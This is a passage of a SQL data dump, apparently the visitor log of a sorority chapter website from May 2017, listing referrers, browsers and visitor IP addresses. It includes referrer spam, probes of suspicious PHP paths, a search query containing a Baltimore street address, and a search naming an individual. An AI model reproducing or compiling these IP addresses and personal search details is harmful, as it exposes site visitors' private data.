/','Safari','iPhone','10.0','','73.201.199.79','000',2,0),(4117,'2017-05-05','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',1,0),(4118,'2017-05-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.81','000',2,0),(4119,'2017-05-06','http://zphiblgz.org','MSIE','Windows','11.0','','196.52.84.75','000',6,0),(4120,'2017-05-06','http://zphiblgz.org','Firefox','Windows','40.1','','37.24.147.158','000',2,0),(4121,'2017-05-06','http://zphiblgz.org','Firefox','Windows','40.1','','41.79.219.218','000',2,0),(4122,'2017-05-06','https://2dm.prohoster.info/domain-registration/domain-whois-lookup.php','MSIE','Windows','6.0','','37.229.253.129','000',3,0),(4123,'2017-05-06','http://zphiblgz.org/members/','Chrome','Windows','47.0.2526.111','','176.123.5.85','000',4,0),(4124,'2017-05-06','http://zphiblgz.org','Chrome','Macintosh','55.0.2883.95','','52.87.86.158','000',2,0),(4125,'2017-05-06','http://zphiblgz.org','Firefox','Windows','40.1','','183.177.101.234','000',2,0),(4126,'2017-05-06','http://zphiblgz.org','Firefox','Windows','40.1','','82.137.255.145','000',2,0),(4127,'2017-05-06','http://vzglyadriv.kg/','MSIE','Windows','6.0','','46.118.155.24','000',2,0),(4128,'2017-05-06','https://bpro1.top/','MSIE','Windows','7.0a1','','46.118.116.168','000',1,0),(4129,'2017-05-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','78.109.23.1','000',2,0),(4130,'2017-05-06','http://zphiblgz.org/','Firefox','Windows','7.0.1','','196.54.55.2','000',1,0),(4131,'2017-05-06','http://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.175','000',1,0),(4132,'2017-05-06','http://www.zphibmaryland.org/chapters/','Safari','iPhone','10.0','','107.77.241.8','000',2,0),(4133,'2017-05-06','https://ohmyrings.com/','MSIE','Windows','6.0','','46.118.116.168','000',1,0),(4134,'2017-05-06','http://zphiblgz.org','Chrome','Android','58.0.3029.83','','73.197.119.109','000',1,0),(4135,'2017-05-06','http://zphiblgz.org','Firefox','Windows','40.1','','130.105.84.59','000',2,0),(4136,'2017-05-06','http://www.zphibmaryland.org/chapters/','MSIE','Windows','11.0','','38.104.238.186','000',3,0),(4137,'2017-05-06','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','216.19.208.204','000',1,0),(4138,'2017-05-06','http://zphiblgz.org/','Firefox','Windows','7.0.1','','64.113.32.29','000',1,0),(4139,'2017-05-06','http://zphiblgz.org','Unknown','Unknown','Unknown','','84.200.223.34','000',1,0),(4140,'2017-05-06','http://zphiblgz.org','Unknown','Unknown','Unknown','','213.251.182.107','000',1,0),(4141,'2017-05-06','http://zphiblgz.org','Unknown','Unknown','Unknown','','74.208.114.99','000',1,0),(4142,'2017-05-06','http://zphiblgz.org','Unknown','Unknown','Unknown','','103.67.235.78','000',1,0),(4143,'2017-05-06','http://zphiblgz.org','Unknown','Unknown','Unknown','','217.76.142.89','000',1,0),(4144,'2017-05-06','http://zphiblgz.org','Unknown','Unknown','Unknown','','79.170.95.199','000',1,0),(4145,'2017-05-06','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.120','000',1,0),(4146,'2017-05-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.39.2','000',2,0),(4147,'2017-05-06','https://murmansk.afora.ru/','Opera','Windows','7.11','','46.119.117.60','000',1,0),(4148,'2017-05-06','http://krasivoe-hd.net/','MSIE','Windows','6.0','','178.137.4.41','000',1,0),(4149,'2017-05-06','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',2,0),(4150,'2017-05-06','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(4151,'2017-05-06','http://zphiblgz.org','curl','Unknown','7.47.0','','93.174.93.80','000',1,0),(4152,'2017-05-06','https://www.google.com/','Chrome','Android','56.0.2924.87','','174.205.6.235','000',1,0),(4153,'2017-05-06','http://www.zphibmaryland.org/chapters/','Safari','iPhone','10.0','','107.77.241.4','000',5,0),(4154,'2017-05-06','http://tula.zrus.org/','MSIE','Windows','5.5','','46.119.117.60','000',1,0),(4155,'2017-05-06','http://surgut.zrus.org/','MSIE','Unknown','6.0','','46.118.155.24','000',3,0),(4156,'2017-05-06','http://zphiblgz.org','Firefox','Windows','40.1','','68.0.55.136','000',2,0),(4157,'2017-05-06','http://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','178.137.83.79','000',7,0),(4158,'2017-05-06','http://zphiblgz.org','Chrome','Android','43.0.2357.93','','70.208.72.51','000',4,0),(4159,'2017-05-06','http://www.zaobao.com.sg','MSIE','Unknown','9.0','','139.226.144.142','000',1,0),(4160,'2017-05-06','https://www.google.com/','Safari','iPhone','10.0','','174.205.8.188','000',4,0),(4161,'2017-05-06','http://search.myway.com/search/GGmain.jhtml?p2=%5ECAQ%5Exdm100%5ETTAB02%5Eus&ptb=52270F7C-51A9-4AF7-9542-B66049ACBC65&n=7839bff0&ind=&cn=us&ln=en&si=49588_SM-SV-Chrome-JAR-NEW-DA&tpr=hpsb&trs=wtt&brwsid=e7dd8a4a-94b0-4672-97d4-f42b97dd5bfc&searchfor=1410-1500%20s.clinton%20st%20baltimore%2Cmd.21224&st=tab','Chrome','Windows','57.0.2987.133','','98.117.202.172','000',5,0),(4162,'2017-05-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.216','000',1,0),(4163,'2017-05-06','http://zphiblgz.org/','Firefox','Windows','7.0.1','','192.160.102.166','000',1,0),(4164,'2017-05-06','http://zphiblgz.org','Linguee','Unknown','Unknown','','62.138.14.228','000',3,0),(4165,'2017-05-06','http://zphiblgz.org','Firefox','Windows','40.1','','125.178.175.12','000',2,0),(4166,'2017-05-07','http://zphiblgz.org','Safari','iPad','10.0','','73.173.91.7','000',1,0),(4167,'2017-05-07','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.125','000',1,0),(4168,'2017-05-07','http://zphiblgz.org','Firefox','Windows','40.1','','45.248.5.201','000',2,0),(4169,'2017-05-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','92.222.69.25','000',1,0),(4170,'2017-05-07','http://zphiblgz.org/','Firefox','Windows','7.0.1','','195.154.122.54','000',1,0),(4171,'2017-05-07','http://prohoster.info/vps/abuzoustojchivye-vps','Unknown','Unknown','Unknown','','37.229.253.129','000',2,0),(4172,'2017-05-07','https://groupmoney.ru/','MSIE','Windows','6.0','','178.137.4.41','000',2,0),(4173,'2017-05-07','http://zphiblgz.org','Firefox','Linux','34.0','','198.204.244.34','000',1,0),(4174,'2017-05-07','http://zphiblgz.org','Firefox','Linux','21.0','','37.187.56.76','000',2,0),(4175,'2017-05-07','http://zphiblgz.org/wp-content/uploads/logo_img.php','Chrome','Windows','42.0.2311.152','','163.172.107.12','000',1,0),(4176,'2017-05-07','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(4177,'2017-05-07','http://www.zphibmaryland.org/chapters/','Safari','iPhone','10.0','','73.201.199.79','000',4,0),(4178,'2017-05-07','http://zphiblgz.org','Apache-HttpClient','Unknown','UNAVAILABLE','','174.204.5.142','000',1,0),(4179,'2017-05-07','http://zphiblgz.org','Firefox','Windows','40.1','','40.142.215.89','000',2,0),(4180,'2017-05-07','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.37','000',1,0),(4181,'2017-05-07','http://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.69','000',2,0),(4182,'2017-05-07','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.143','','211.214.35.51','000',1,0),(4183,'2017-05-07','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.143','','1.251.221.41','000',1,0),(4184,'2017-05-07','https://www.google.com/','Chrome','Android','56.0.2924.87','','174.205.6.235','000',1,0),(4185,'2017-05-07','http://zphiblgz.org','Chrome','Windows','27.0.1453.90','','51.15.53.83','000',1,0),(4186,'2017-05-07','https://www.google.com/','Safari','iPhone','10.0','','174.205.13.34','000',4,0),(4187,'2017-05-07','http://zphiblgz.org/','Safari','iPhone','10.0','','107.77.241.10','000',1,0),(4188,'2017-05-07','http://777-club.ru/','MSIE','Windows','5.5','','46.119.117.60','000',1,0),(4189,'2017-05-07','http://naberezhnyechelny.zrus.org/','MSIE','Windows','6.0','','46.119.117.60','000',1,0),(4190,'2017-05-07','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(4191,'2017-05-07','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',1,0),(4192,'2017-05-07','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','173.208.207.162','000',4,0),(4193,'2017-05-07','https://glicol.kz/','MSIE','Windows','6.0','','46.118.155.24','000',1,0),(4194,'2017-05-07','http://zphiblgz.org','Firefox','Windows','40.1','','31.167.31.34','000',2,0),(4195,'2017-05-07','http://zphiblgz.org','MSIE','Windows','11.0','','113.67.181.191','000',3,0),(4196,'2017-05-07','https://google.com','Firefox','Linux','26.0','','37.59.4.151','000',1,0),(4197,'2017-05-07','http://mygameplus.com/','MSIE','Windows','5.5','','178.137.4.41','000',3,0),(4198,'2017-05-08','http://sstroy44.ru/','MSIE','Windows','6.0','','46.118.116.168','000',6,0),(4199,'2017-05-08','http://zphiblgz.org','Firefox','Windows','34.0','','194.28.115.252','000',6,0),(4200,'2017-05-08','http://zajm-pod-zalog-nedvizhimosti.ru/','MSIE','Windows','5.5','','46.118.155.24','000',2,0),(4201,'2017-05-08','https://www.google.com/','Firefox','Macintosh','52.0','','71.244.251.83','000',9,0),(4202,'2017-05-08','http://zphiblgz.org','Firefox','Windows','40.1','','78.183.138.118','000',2,0),(4203,'2017-05-08','http://kaliningrad.zrus.org/','MSIE','Windows','6.0','','46.119.117.60','000',3,0),(4204,'2017-05-08','http://zphiblgz.org','Firefox','Windows','40.1','','179.236.39.123','000',2,0),(4205,'2017-05-08','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.62','000',1,0),(4206,'2017-05-08','http://tomsk.zrus.org/','MSIE','Windows','7.0a1','','46.118.155.24','000',2,0),(4207,'2017-05-08','http://zphiblgz.org','Firefox','Windows','40.1','','84.221.67.73','000',2,0),(4208,'2017-05-08','http://zphiblgz.org','Firefox','Windows','40.1','','111.94.92.121','000',2,0),(4209,'2017-05-08','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=20&ved=0ahUKEwjR_L7Dt-DTAhXGdSYKHbctDsc4ChAWCEswCQ&url=http%3A%2F%2Fzphiblgz.org%2Fhistory%2F&usg=AFQjCNGBdqTC7I-6SbdQS3CAHLsMUZxcCQ','MSIE','Windows','11.0','','149.101.1.115','000',2,0),(4210,'2017-05-08','http://zphiblgz.org','Firefox','Windows','40.1','','181.163.113.52','000',2,0),(4211,'2017-05-08','http://zphiblgz.org','MSIE','Windows','11.0','','205.222.248.81','000',3,0),(4212,'2017-05-08','http://www.zphibmaryland.org/chapters/','Safari','iPhone','10.0','','107.77.241.8','000',5,0),(4213,'2017-05-08','http://zphiblgz.org','Chrome','Windows','57.0.2987.98','','46.229.170.197','000',1,0),(4214,'2017-05-08','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0ahUKEwjltZnT4-DTAhVLKyYKHeyZCKEQFghdMAk&url=http%3A%2F%2Fzphiblgz.org%2Fscholarship%2F&usg=AFQjCNGGuWy2KSIOcbzM6-Bb9Xl9Kf1gjQ&sig2=7lAGROUW224JcaNq5XwF2w','MSIE','Windows','11.0','','167.201.241.175','000',1,0),(4215,'2017-05-08','http://zphiblgz.org','Firefox','Windows','40.1','','177.65.178.83','000',2,0),(4216,'2017-05-08','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.116','000',1,0),(4217,'2017-05-08','http://zphiblgz.org','Chrome','Windows','57.0.2987.133','','214.36.0.135','000',1,0),(4218,'2017-05-08','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',5,0),(4219,'2017-05-08','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(4220,'2017-05-08','http://zphiblgz.org','MSIE','Windows','11.0','','198.50.180.169','000',2,0),(4221,'2017-05-08','http://zphiblgz.org/members/','MSIE','Windows','11.0','','172.82.158.177','000',1,0),(4222,'2017-05-08','http://zphiblgz.org','Firefox','Windows','40.1','','89.137.107.39','000',2,0),(4223,'2017-05-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','166.62.34.63','000',4,0),(4224,'2017-05-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','212.21.66.6','000',1,0),(4225,'2017-05-08','http://zphiblgz.org/','Firefox','Windows','7.0.1','','62.210.37.82','000',1,0),(4226,'2017-05-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','110.80.83.243','000',21,0),(4227,'2017-05-08','http://zphiblgz.org','Firefox','Windows','40.1','','108.207.230.67','000',2,0),(4228,'2017-05-08','http://zphiblgz.org','MSIE','Windows','8.0','','149.202.24.109','000',17,0),(4229,'2017-05-08','http://zphiblgz.org','Chrome','Windows','51.0.2704.103','','54.90.41.238','000',1,0),(4230,'2017-05-08','http://zphiblgz.org','Chrome','Windows','51.0.2704.103','','64.62.210.39','000',2,0),(4231,'2017-05-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.62','000',1,0),(4232,'2017-05-08','http://zphiblgz.org/','Safari','iPhone','10.0','','73.201.199.79','000',2,0),(4233,'2017-05-08','http://stavropol.zrus.org/','Opera','Windows','7.02','','46.119.117.60','000',1,0),(4234,'2017-05-08','http://zphiblgz.org','Chrome','Macintosh','44.0.2403.89','','103.255.254.122','000',1,0),(4235,'2017-05-09','http://tver.zrus.org/','Opera','Windows','9.00','','46.118.155.24','000',1,0),(4236,'2017-05-09','http://zphiblgz.org','Firefox','Windows','40.1','','45.122.127.92','000',2,0),(4237,'2017-05-09','http://zphiblgz.org/members/','Chrome','Windows','48.0.2564.97','','31.184.238.249','000',3,0),(4238,'2017-05-09','http://zphiblgz.org/wp-content/logo_img.php','Chrome','Windows','42.0.2311.152','','195.154.251.162','000',1,0),(4239,'2017-05-09','http://zphiblgz.org','Firefox','Windows','40.1','','116.75.193.94','000',1,0),(4240,'2017-05-09','http://zphiblgz.org','Firefox','Windows','40.1','','180.191.61.12','000',2,0),(4241,'2017-05-09','http://zphiblgz.org/wp-admin/includes/image-import.php','MSIE','Windows','6.0','','176.8.88.176','000',1,0),(4242,'2017-05-09','http://zphiblgz.org','Unknown','Unknown','Unknown','','174.137.187.69','000',1,0),(4243,'2017-05-09','http://zphiblgz.org','Unknown','Unknown','Unknown','','81.95.96.160','000',1,0),(4244,'2017-05-09','http://zphiblgz.org','Unknown','Unknown','Unknown','','103.67.235.2','000',1,0),(4245,'2017-05-09','http://zphiblgz.org','Unknown','Unknown','Unknown','','212.97.132.209','000',1,0),(4246,'2017-05-09','http://zphiblgz.org','Unknown','Unknown','Unknown','','184.168.200.228','000',1,0),(4247,'2017-05-09','http://zphiblgz.org','MSIE','Windows','9.0','','131.253.36.198','000',1,0),(4248,'2017-05-09','http://zphiblgz.org/','Safari','iPhone','10.0','','166.91.253.17','000',1,0),(4249,'2017-05-09','http://zphiblgz.org','Firefox','Windows','1.0.7','','54.204.111.46','000',1,0),(4250,'2017-05-09','http://zphiblgz.org','Chrome','Macintosh','58.0.3029.81','','100.36.69.16','000',6,0),(4251,'2017-05-09','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.24','000',11,0),(4252,'2017-05-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.212.73.141','000',1,0),(4253,'2017-05-09','http://zphiblgz.org/','Firefox','Windows','7.0.1','','198.50.200.135','000',1,0),(4254,'2017-05-09','http://zphiblgz.org','Chrome','Windows','58.0.3029.96','','204.126.132.241','000',1,0),(4255,'2017-05-09','http://zphiblgz.org','curl','Unknown','7.47.0','','93.174.93.80','000',1,0),(4256,'2017-05-09','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',2,0),(4257,'2017-05-09','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',3,0),(4258,'2017-05-09','http://zphiblgz.org','Chrome','Windows','58.0.3029.96','','208.76.113.5','000',1,0),(4259,'2017-05-09','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.61','000',1,0),(4260,'2017-05-09','http://zphiblgz.org','Unknown','Unknown','Unknown','','54.204.111.46','000',1,0),(4261,'2017-05-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','87.118.116.12','000',1,0),(4262,'2017-05-09','http://zphiblgz.org/','Firefox','Windows','7.0.1','','89.234.157.254','000',1,0),(4263,'2017-05-09','http://zphiblgz.org','Firefox','Windows','40.1','','70.210.73.101','000',2,0),(4264,'2017-05-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','198.58.100.240','000',1,0),(4265,'2017-05-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','149.56.204.218','000',1,0),(4266,'2017-05-09','http://zphiblgz.org/','Firefox','Windows','7.0.1','','207.244.70.35','000',1,0),(4267,'2017-05-09','https://atleticpharm.org/','Opera','Windows','7.11','','178.137.4.41','000',2,0),(4268,'2017-05-09','http://zphiblgz.org','Chrome','Linux','34.0.1910.63','','138.128.61.190','000',2,0),(4269,'2017-05-09','http://zphiblgz.org','Firefox','Windows','40.1','','181.164.128.27','000',2,0),(4270,'2017-05-09','http://zphiblgz.org/event/ms-walk-2017/','Chrome','Windows','48.0.2564.103','','31.184.238.221','000',4,0),(4271,'2017-05-09','http://khantymansiysk.zrus.org/','MSIE','Windows','6.0','','46.119.117.60','000',2,0),(4272,'2017-05-09','http://zphiblgz.org','Firefox','Windows','40.1','','139.194.136.20','000',2,0),(4273,'2017-05-09','http://zphiblgz.org','MSIE','Windows','11.0','','37.187.78.81','000',1,0),(4274,'2017-05-09','http://zphiblgz.org','Chrome','Macintosh','27.0.1453.93','','5.9.112.6','000',1,0),(4275,'2017-05-10','http://zphiblgz.org/','Chrome','Windows','39.0.2171.99','','146.185.223.87','000',2,0),(4276,'2017-05-10','http://zphiblgz.org/','Opera','Windows','12.17','','146.185.223.87','000',6,0),(4277,'2017-05-10','http://zphiblgz.org','Firefox','Windows','1.0.7','','54.244.77.190','000',1,0),(4278,'2017-05-10','http://zphiblgz.org','Firefox','Windows','40.1','','175.158.182.34','000',2,0),(4279,'2017-05-10','http://zphiblgz.org','Firefox','Windows','40.1','','219.204.159.157','000',2,0),(4280,'2017-05-10','https://glicol.kz/','Opera','Windows','9.0','','46.118.155.24','000',1,0),(4281,'2017-05-10','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=13&ved=0ahUKEwjI5bCRo-XTAhVGWiwKHf45AKU4ChAWCC0wAg&url=http%3A%2F%2Fzphiblgz.org%2Fprograms%2F&usg=AFQjCNECQhP2O76-B_EHGciyIOEw4nqV9Q','MSIE','Windows','11.0','','131.78.160.229','000',2,0),(4282,'2017-05-10','http://oballergiya.ru/','MSIE','Windows','6.0','','178.137.4.41','000',3,0),(4283,'2017-05-10','http://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',2,0),(4284,'2017-05-10','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','173.208.207.162','000',4,0),(4285,'2017-05-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','92.222.69.25','000',2,0),(4286,'2017-05-10','http://zphiblgz.org','Firefox','Windows','40.1','','43.241.133.88','000',2,0),(4287,'2017-05-10','http://elvel.com.ua/girobordy','MSIE','Windows','5.5','','46.118.116.168','000',1,0),(4288,'2017-05-10','http://zphiblgz.org','Unknown','Unknown','Unknown','','104.156.245.248','000',1,0),(4289,'2017-05-10','http://zphiblgz.org','Firefox','Macintosh','29.0','','54.144.58.136','000',1,0),(4290,'2017-05-10','http://zphiblgz.org','Unknown','Unknown','Unknown','','149.3.144.206','000',1,0),(4291,'2017-05-10','http://zphiblgz.org','Firefox','Windows','40.1','','175.101.99.155','000',2,0),(4292,'2017-05-10','http://zphiblgz.org','MSIE','Windows','11.0','','193.201.224.239','000',1,0),(4293,'2017-05-10','http://zphiblgz.org','Go--client','Unknown','1.1','','217.182.88.168','000',3,0),(4294,'2017-05-10','http://zphiblgz.org','Go--client','Unknown','1.1','','217.182.93.250','000',4,0),(4295,'2017-05-10','http://zphiblgz.org','Go--client','Unknown','1.1','','217.182.92.172','000',8,0),(4296,'2017-05-10','http://zphiblgz.org','Go--client','Unknown','1.1','','217.182.95.33','000',4,0),(4297,'2017-05-10','http://zphiblgz.org','Go--client','Unknown','1.1','','217.182.93.87','000',8,0),(4298,'2017-05-10','http://zphiblgz.org','Unknown','Unknown','Unknown','','104.254.244.80','000',2,0),(4299,'2017-05-10','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','172.241.151.29','000',1,0),(4300,'2017-05-10','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',51,0),(4301,'2017-05-10','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',8,0),(4302,'2017-05-10','http://ivanstroi.ru/','MSIE','Windows','6.0','','46.118.155.24','000',3,0),(4303,'2017-05-10','http://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.208.45.183','000',1,0),(4304,'2017-05-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.233.105.123','000',1,0),(4305,'2017-05-10','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.62.188.139','000',1,0),(4306,'2017-05-10','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','93.174.93.80','000',1,0),(4307,'2017-05-10','http://zphiblgz.org','curl','Unknown','7.47.0','','93.174.93.80','000',1,0),(4308,'2017-05-10','https://www.google.com/','Chrome','Windows','57.0.2987.133','','98.233.81.31','000',2,0),(4309,'2017-05-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.170.41.7','000',2,0),(4310,'2017-05-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','80.67.172.162','000',1,0),(4311,'2017-05-10','http://kostroma.zrus.org/','Opera','Windows','7.11','','37.229.253.129','000',3,0),(4312,'2017-05-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','108.175.11.230','000',2,0),(4313,'2017-05-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.40.233','000',2,0),(4314,'2017-05-10','http://zphiblgz.org','Unknown','Unknown','Unknown','','192.99.150.97','000',12,0),(4315,'2017-05-10','http://zphiblgz.org','Chrome','Android','45.0.2454.94','','192.99.150.97','000',1,0),(4316,'2017-05-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','149.56.223.241','000',2,0),(4317,'2017-05-10','http://zphiblgz.org','Go--client','Unknown','1.1','','217.182.91.132','000',1,0),(4318,'2017-05-10','http://zphiblgz.org','Firefox','Windows','34.0','','146.185.223.87','000',1,0),(4319,'2017-05-10','http://www.pechikamini.ru/','Opera','Windows','9.0','','46.118.116.168','000',4,0),(4320,'2017-05-10','https://bio-optomarket.ru/','Opera','Windows','9.00','','46.118.116.168','000',1,0),(4321,'2017-05-10','http://zphiblgz.org','Firefox','Windows','40.1','','59.95.146.226','000',2,0),(4322,'2017-05-10','http://prohoster.info/hosting/unlim-khosting','Opera','Windows','7.02','','37.229.253.129','000',1,0),(4323,'2017-05-10','http://zphiblgz.org','Firefox','Windows','40.1','','200.175.247.188','000',2,0),(4324,'2017-05-11','zphiblgz.org','Chrome','Windows','50.0.2661.75','','37.187.132.5','000',6,0),(4325,'2017-05-11','http://zphiblgz.org','Pinterest','Unknown','0.2','','54.236.1.13','000',1,0),(4326,'2017-05-11','http://zphiblgz.org','Firefox','Windows','40.1','','41.71.76.154','000',2,0),(4327,'2017-05-11','http://zphiblgz.org','Chrome','Windows','44.0.2403.130','','86.145.72.166','000',1,0),(4328,'2017-05-11','http://zphiblgz.org/login/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','MSIE','Windows','8.0','','5.61.35.40','000',1,0),(4329,'2017-05-11','http://zphiblgz.org/wp-admin/','Safari','iPad','5.1','','5.61.35.40','000',1,0),(4330,'2017-05-11','http://zphiblgz.org','Firefox','Windows','40.1','','201.11.122.223','000',2,0),(4331,'2017-05-11','http://zphiblgz.org/popup-pomo.php','Chrome','Windows','42.0.2311.152','','216.244.85.106','000',1,0),(4332,'2017-05-11','https://www.google.com/','Chrome','Android','52.0.2743.98','','208.54.35.174','000',3,0),(4333,'2017-05-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','87.180.237.220','000',1,0),(4334,'2017-05-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.171.202.150','000',2,0),(4335,'2017-05-11','http://www.google.com/','Chrome','Android','58.0.3029.83','','71.179.233.237','000',3,0),(4336,'2017-05-11','http://zphiblgz.org','Unknown','Unknown','Unknown','','69.195.124.215','000',2,0),(4337,'2017-05-11','https://www.google.com/','Safari','iPhone','10.0','','73.85.207.96','000',1,0),(4338,'2017-05-11','http://www.bing.com/search?q=2017%20ZETA%20PHI%20BETA%20SORORITY%2C%20INC%20MARCH%20OF%20DIMES&qs=n&form=QBRE&sp=-1&pq=2017%20zeta%20phi%20beta%20sorority%2C%20inc%20march%20of%20dimes&sc=0-47&sk=&cvid=572B94A57FF64BFC960E5C3E8243ABDB','MSIE','Windows','11.0','','198.96.63.107','000',1,0),(4339,'2017-05-11','https://www.google.com','Firefox','Macintosh','42.0','','50.225.39.79','000',1,0),(4340,'2017-05-11','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.62','000',1,0),(4341,'2017-05-11','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',3,0),(4342,'2017-05-11','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',1,0),(4343,'2017-05-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','162.247.73.206','000',1,0),(4344,'2017-05-11','http://zphiblgz.org/','Firefox','Windows','7.0.1','','193.107.85.62','000',1,0),(4345,'2017-05-11','http://zphiblgz.org','Safari','iPhone','10.0','','166.137.240.121','000',3,0),(4346,'2017-05-11','https://www.google.com/','Chrome','Windows','58.0.3029.96','','199.116.174.52','000',10,0),(4347,'2017-05-11','http://zphiblgz.org','MSIE','Windows','11.0','','170.232.235.222','000',3,0),(4348,'2017-05-11','http://www.zphibmaryland.org/chapters/','MSIE','Windows','11.0','','69.195.247.116','000',2,0),(4349,'2017-05-11','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',1,0),(4350,'2017-05-11','http://zphiblgz.org','curl','Unknown','7.47.0','','93.174.93.80','000',1,0),(4351,'2017-05-11','http://www.google.com/','Chrome','Android','58.0.3029.83','','98.117.207.25','000',9,0),(4352,'2017-05-11','http://zphiblgz.org/','Firefox','Windows','35.0','','196.196.88.29','000',2,0),(4353,'2017-05-11','http://zphiblgz.org','Chrome','Windows','51.0.2704.103','','64.62.210.39','000',1,0),(4354,'2017-05-11','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(4355,'2017-05-11','http://zphiblgz.org/','MSIE','Windows','11.0','','81.171.59.141','000',1,0),(4356,'2017-05-11','http://zphiblgz.org/wp-includes/routing.php','MSIE','Windows','6.0','','176.8.88.176','000',1,0),(4357,'2017-05-12','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.187.117.10','000',2,0),(4358,'2017-05-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.10.107.180','000',2,0),(4359,'2017-05-12','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.15','000',3,0),(4360,'2017-05-12','http://zphiblgz.org','Firefox','Windows','40.1','','81.183.234.144','000',2,0),(4361,'2017-05-12','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.93.3','000',1,0),(4362,'2017-05-12','http://zphiblgz.org','Firefox','Windows','3.6','','185.129.148.44','000',2,0),(4363,'2017-05-12','https://www.google.com/','Chrome','Windows','57.0.2987.133','','75.148.25.17','000',1,0),(4364,'2017-05-12','http://zphiblgz.org/event/ms-walk-2017/','MSIE','Windows','6.0','','72.11.150.81','000',1,0),(4365,'2017-05-12','http://zphiblgz.org/event/ms-walk-2017/','MSIE','Windows','6.0','','27.36.135.173','000',1,0),(4366,'2017-05-12','http://zphiblgz.org/event/ms-walk-2017/','MSIE','Windows','6.0','','123.16.114.116','000',1,0),(4367,'2017-05-12','http://zphiblgz.org/event/ms-walk-2017/','MSIE','Windows','6.0','','93.80.33.197','000',1,0),(4368,'2017-05-12','http://zphiblgz.org/event/ms-walk-2017/','MSIE','Windows','6.0','','45.79.133.167','000',1,0),(4369,'2017-05-12','http://zphiblgz.org/event/ms-walk-2017/','MSIE','Windows','6.0','','216.144.235.204','000',1,0),(4370,'2017-05-12','http://zphiblgz.org/event/ms-walk-2017/','MSIE','Windows','6.0','','94.126.26.194','000',1,0),(4371,'2017-05-12','http://zphiblgz.org/event/ms-walk-2017/','MSIE','Windows','6.0','','67.215.251.153','000',1,0),(4372,'2017-05-12','http://zphiblgz.org/event/ms-walk-2017/','MSIE','Windows','6.0','','45.79.221.25','000',1,0),(4373,'2017-05-12','http://zphiblgz.org','Firefox','Windows','40.1','','89.64.51.37','000',1,0),(4374,'2017-05-12','http://www.bing.com/search?q=zeta%20phi%20beta%20sorority%20scholarship%20latricia%20marie%20barnes&qs=n&form=QBRE&sp=-1&pq=zeta%20phi%